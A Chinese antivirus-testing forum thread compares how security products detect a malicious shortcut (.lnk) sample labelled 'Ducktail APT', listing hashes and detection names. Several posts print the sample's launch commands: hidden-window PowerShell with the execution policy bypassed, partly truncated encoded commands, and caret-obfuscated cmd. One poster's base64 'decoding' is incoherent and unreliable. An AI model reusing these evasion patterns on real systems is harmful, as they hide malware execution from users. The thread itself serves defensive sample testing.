Ducktail APT

显示全部楼层 · 发表于 2024-3-20 17:15:56

avast miss

显示全部楼层 · 发表于 2024-3-20 17:23:49

EMSI

显示全部楼层 · 发表于 2024-3-20 17:31:27

火绒

防护项目：隐藏执行PowerShell
执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -Command "$qcljngg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::......
操作结果：已允许

复制代码

防护项目：利用PowerShell执行可疑脚本
执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAYwBt......
操作结果：已允许

复制代码

防护项目：隐藏执行PowerShell
执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell.exe -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand JABqAGMAYgBnAGcAaQBlAGYAcQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuA......
操作结果：已允许

复制代码

显示全部楼层 · 发表于 2024-3-20 17:45:37

组件: 文件反病毒
结果说明: 检测到
类型: 木马
名称: HEUR:Trojan.Multi.Powesta.g
精确度: 确切
威胁级别: 高
对象类型: 文件
对象名称: 5fb0518c2ced3e2556da039dae3cfe846cbf667ef2556c6d75b1487da75ef15f.lnk
对象的 MD5: 479B235ADAA09FB5BE9ABB618EF56856
原因: 专家分析
数据库发布日期: 今天，2024/3/20 下午4:24:00

显示全部楼层 · 发表于 2024-3-20 17:48:04

本帖最后由 DisaPDB 于 2024-3-20 17:56 编辑

Qihoo360
Code:

C:\WINDOWS\system32\cmd.exe /c start /min "" p^o^w^ershell.ex^e -W^i^n^d^owSt^yle h^id^de^n -No^Lo^go -N^o^Pro^f^i^l^e -Exec^ut^i^o^nP^oli^c^y by^p^ass -C^omm^a^n^d "$qcljngg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('<span style="background-color: rgba(175, 184, 193, 0.2); color: rgb(31, 35, 40); font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 13.6px; white-space: break-spaces;">JGNvbnRleHQ9Ilx4NWNcdTAwMzFcdTAwM2FcdTAwMzlcdTAwMzhcdTAwM2ZcdTAwMzVcdTAwM2QnKCRfLkNvbnRleHQpOyRkYXRhPSJceDVjXHUwMDMyXHUwMDNjXHUwMDM4XHUwMDM5XHUwMDNmXHUwMDM1XHUwMDNkIjtmb3IoJGk9MDskaTxkYXRhLmxlbmd0aDsrKykgeyAkZGF0YVskaV09JGRhdGFbJGldLmNoYXJDb2RlQXQoMCktMTI4O30kZXhlY3V0ZT0iJGNvbnRleHQ6JGRhdGEiOyRFeGVjdXRpb25Qb2xpY3kgPSAiQnlwYXNzIjskUHJvY2VzcyA9ICJuYXZpZ2F0b3IuZXhlY3V0ZShTeW1ib2wuQXNzdW1wdGlvbi5nZXRSZXNvdXJjZSgiTWljcm9zb2Z0LlVJIiwiUGFnZUNvbnRlbnQuRXhlY3V0ZUV4dGVuc2lvbiIpLmV4ZWN1dGVFeHRlbnNpb24oJGV4ZWN1dGUpLCBudWxsLCBudWxsLCBudWxsKTsi</span>

复制代码

Base64 Decoding:

$context = "\x5c\x31\x3a\x39\x38\x3f\x35\x3d'($_.Context)";
$data = "\x5c\x32\x3c\x38\x39\x3f\x35\x3d";
for ($i = 0; $i -lt $data.Length; $i++) {
$data[$i] = $data[$i].charCodeAt(0) - 128;
}
$execute = "$context:$data";
$ExecutionPolicy = "Bypass";
$Process = "navigator.execute(Symbol.Assumption.getResource(`"Microsoft.UI`", `"PageContent.ExecuteExtension`").executeExtension($execute), null, null, null);"

复制代码

显示全部楼层 · 发表于 2024-3-20 18:36:23

Tant 发表于 2024-3-20 17:15
avast miss

Avast-kill

显示全部楼层 · 发表于 2024-3-20 18:45:24

顿子

文件名: 5fb0518c2ced3e2556da039dae3cfe846cbf667ef2556c6d75b1487da75ef15f.lnk
威胁名称: CL.Downloader!gen20完整路径: C:\Users\lwq11\Downloads\lnk\5fb0518c2ced3e2556da039dae3cfe846cbf667ef2556c6d75b1487da75ef15f.lnk

____________________________

____________________________

在电脑上
2024/3/20 ( 18:43:05 )

上次使用时间
2024/3/20 ( 18:45:05 )

启动项
否
已启动
否
威胁类型: 启发式病毒。根据恶意软件启发式技术检测威胁。

____________________________

5fb0518c2ced3e2556da039dae3cfe846cbf667ef2556c6d75b1487da75ef15f.lnk威胁名称: CL.Downloader!gen20
定位

极少用户信任的文件
Norton 社区中有不到 5 名用户使用了此文件。

极新的文件
该文件已在不到 1 周前发行。

高
此文件具有高风险。

____________________________

来源: 外部介质

源文件:
5fb0518c2ced3e2556da039dae3cfe846cbf667ef2556c6d75b1487da75ef15f.lnk

____________________________

文件操作

文件: C:\Users\lwq11\Downloads\lnk\5fb0518c2ced3e2556da039dae3cfe846cbf667ef2556c6d75b1487da75ef15f.lnk已删除

____________________________

文件指纹 - SHA:
5fb0518c2ced3e2556da039dae3cfe846cbf667ef2556c6d75b1487da75ef15f
文件指纹 - MD5:
479b235adaa09fb5be9abb618ef56856

显示全部楼层 · 发表于 2024-3-20 21:13:16

WD：Trojan:Script/Wacatac.H!ml

显示全部楼层 · 发表于 2024-3-20 21:46:51

解压后，卡巴斯基无反应，EMSI无反应，360卫士无反应，EMSI扫描正常，卡巴扫描报拦截

[病毒样本] Ducktail APT

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源